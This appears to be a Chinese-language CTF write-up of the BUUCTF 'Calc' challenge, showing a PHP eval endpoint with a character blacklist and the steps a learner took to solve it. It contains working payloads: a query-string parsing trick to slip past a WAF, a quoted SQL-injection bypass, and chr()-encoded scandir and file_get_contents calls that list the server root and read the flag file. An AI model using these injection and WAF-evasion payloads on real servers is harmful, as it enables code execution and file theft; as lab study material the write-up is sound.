首先 一看到名字 就去搜索了 Calc注入 想通過知識點 自己完成 而不是 跟着題解走
然后 看文章
-
同步測試:
找到api:
http://node3.buuoj.cn:28564/calc.phpGET參數:num測試
1*2返回2然后發現毫無卵用
乖乖搜題解
這是別人對PHP字符串解析漏洞的理解,
我們知道PHP將查詢字符串(在URL或正文中)轉換為內部$_GET或的關聯數組 $_POST。例如:/?foo=bar變成Array([foo] => “bar”)。值得注意的是,查詢字符串在解析的過程中會將某些字符刪除或用下划線代替。例如,/?%20news[id%00=42會轉換為Array([news_id] => 42)。如果一個IDS/IPS或WAF中有一條規則是當news_id參數的值是一個非數字的值則攔截,那么我們就可以用以下語句繞過:/news.php?%20news[id%00=42"+AND+1=0–
上述PHP語句的參數%20news[id%00的值將存儲到$_GET[“news_id”]中。
HP需要將所有參數轉換為有效的變量名,因此在解析查詢字符串時,它會做兩件事:
1.刪除空白符
2.將某些字符轉換為下划線(包括空格)
chr() — 返回指定的字符
scandir() — 列出指定路徑中的文件和目錄
var_dump() — 打印變量的相關信息
file_get_contents() — 將整個文件讀入一個字符串
通過上述四個函數 自己嘗試寫出 解 即 payload
首先 通過 chr(‘’) scandir() 搜尋目錄
輸入 _num下划線為 空格 scandir(chr("47")); 時 返回 what are you want to do? 有防火牆
再次查找題解 通過這一篇 發現可以直接訪問 該api的php源碼 故查看源碼
<?php
error_reporting(0);
if(!isset($_GET['num'])){
show_source(__FILE__);
}else{
$str = $_GET['num'];
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $str)) {
die("what are you want to do?");
}
}
eval('echo '.$str.';');
}
?>
發現 \' 和 “ 都被屏蔽了 但是 47 是個數字 就去除了 “” 再次嘗試 返回 Array 沒有顯示具體內容 於是 想着可以使用 var_dump() 來打印
於是 這部分的解為
var_dump(scandir(chr(47)));
返回結果
array(24) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(5) "f1agg" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(3) "opt" [14]=> string(4) "proc" [15]=> string(4) "root" [16]=> string(3) "run" [17]=> string(4) "sbin" [18]=> string(3) "srv" [19]=> string(8) "start.sh" [20]=> string(3) "sys" [21]=> string(3) "tmp" [22]=> string(3) "usr" [23]=> string(3) "var" }
可以找到 f1agg 通過本地檢測 發現 時 數字 1 而非 字母 l 此時再次使用 file_get_contents() var_dump() chr() 打印該文件
var_dump(file_get_contents(chr(102).chr(49).chr(97).chr(103).chr(103))) 等價 var_dump(file_get_contents("flagg"))
返回
bool(false)
分析是路徑問題 添加 /
var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) 等價 var_dump(file_get_contents("/flagg"))
返回
string(43) "flag{926add2b-70f3-435c-83e9-9538b58b9730} "
PHP的基礎知識 … 就這么學吧 哎